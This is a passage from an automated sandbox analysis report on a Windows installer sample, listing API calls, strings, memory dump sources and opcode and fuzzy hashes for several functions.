                                                                                                              • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                              • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                              • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                              • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                              • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                              • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountFileNameTempTick
                                                                                                              • String ID: nsa
                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                              • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                              • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                              • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                              • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                              • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 00405748
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                              • String ID: Error launching installer
                                                                                                              • API String ID: 3712363035-66219284
                                                                                                              • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                              • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                              • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                              • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                              • API String ID: 0-4015495023
                                                                                                              • Opcode ID: 628786edcf781538c88294d5774b5b0adbc8483457ce1e01d9d81bcd6e495caf
                                                                                                              • Instruction ID: e6c670990494d03758b41e2864956bb3f1658689e609c92e2c14c09d89fb2997
                                                                                                              • Opcode Fuzzy Hash: 628786edcf781538c88294d5774b5b0adbc8483457ce1e01d9d81bcd6e495caf
                                                                                                              • Instruction Fuzzy Hash: F6317070E0421A9BDF6C8FA889403EEFAB6BF94310F154079C51AA7254EB70CDC1DB92
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: \;]q$\;]q$\;]q$\;]q
                                                                                                              • API String ID: 0-2351511683
                                                                                                              • Opcode ID: 135741b7379a65328b5b0e8f063d1ca21cd0fe133136b6dc1d4918f8abab5d88
                                                                                                              • Instruction ID: 23264195cdb09c1dd73100a23c90a8486ebdb6b762e5655ea274ac5c75ce94c5
                                                                                                              • Opcode Fuzzy Hash: 135741b7379a65328b5b0e8f063d1ca21cd0fe133136b6dc1d4918f8abab5d88
                                                                                                              • Instruction Fuzzy Hash: D2019E31750909CF8B6C8A2DC49096577EBAFC8B7872545BAE445CB260DB31DC81C782
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                              • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 190613189-0
                                                                                                              • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                              • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                              • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                              • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9